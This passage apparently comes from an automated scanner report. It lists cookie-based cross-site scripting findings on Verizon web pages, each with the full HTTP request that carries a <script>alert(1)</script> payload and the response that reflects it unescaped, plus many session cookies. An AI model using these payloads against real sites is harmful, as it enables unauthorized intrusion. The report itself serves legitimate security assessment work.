Cookie: Source=CHSI; vzapps=STATE=TXcdf59'><script>alert(1)</script>ece11e87003; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64487
Expires: Sat, 20 Nov 2010 00:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcdf59'><script>alert(1)</script>ece11e87003; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDF59'><SCRIPT>ALERT(1)</SCRIPT>ECE11E87003 ' />
...[SNIP]...

3.189. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9450<script>alert(1)</script>4aca6b8b3b4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc9450<script>alert(1)</script>4aca6b8b3b4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92711
Expires: Sat, 20 Nov 2010 03:15:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc9450<script>alert(1)</script>4aca6b8b3b4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC9450<SCRIPT>ALERT(1)</SCRIPT>4ACA6B8B3B4 </DIV>
...[SNIP]...

3.190. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab748'><script>alert(1)</script>80592d937c4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXab748'><script>alert(1)</script>80592d937c4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92716
Expires: Sat, 20 Nov 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab748'><script>alert(1)</script>80592d937c4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB748'><SCRIPT>ALERT(1)</SCRIPT>80592D937C4 ' />
...[SNIP]...

3.191. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668ed'><script>alert(1)</script>bf2d4cd51f6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668ed'><script>alert(1)</script>bf2d4cd51f6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91146
Expires: Sat, 20 Nov 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668ed'><script>alert(1)</script>bf2d4cd51f6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668ED'><SCRIPT>ALERT(1)</SCRIPT>BF2D4CD51F6 ' />
...[SNIP]...

3.192. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 5360b<script>alert(1)</script>87b39a50ac5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5360b<script>alert(1)</script>87b39a50ac5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5360b<script>alert(1)</script>87b39a50ac5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5360B<SCRIPT>ALERT(1)</SCRIPT>87B39A50AC5 </DIV>
...[SNIP]...

3.193. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 85766<script>alert(1)</script>8553ba7b684 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
